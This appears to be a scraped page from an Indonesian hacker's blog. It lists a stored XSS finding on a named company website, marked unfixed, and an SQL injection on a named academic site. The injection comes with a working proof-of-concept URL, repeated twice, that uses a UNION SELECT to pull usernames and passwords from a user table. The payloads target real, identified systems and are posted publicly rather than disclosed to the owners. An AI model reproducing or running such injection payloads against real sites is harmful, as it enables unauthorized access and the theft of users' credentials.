Stored XSS in http://www.damafurn.co.id
./MyHeartIsyr is back!!
Status: Unfixed
Status: Unfixed
Saturday, May 11, 2019
Thursday, May 9, 2019
SQL Injection in http://pps.iiq.ac.id/
Iseng dorking XSS malah nemu bug SQL Injection :D
POC: http://pps.iiq.ac.id/pustaka/search.php?prefix=Q%27+union+select+1,2,group_concat(username,0x3a,password,0x3a),4,5+from+_xuser--+-
POC: http://pps.iiq.ac.id/pustaka/search.php?prefix=Q%27+union+select+1,2,group_concat(username,0x3a,password,0x3a),4,5+from+_xuser--+-
Subscribe to:
Posts (Atom)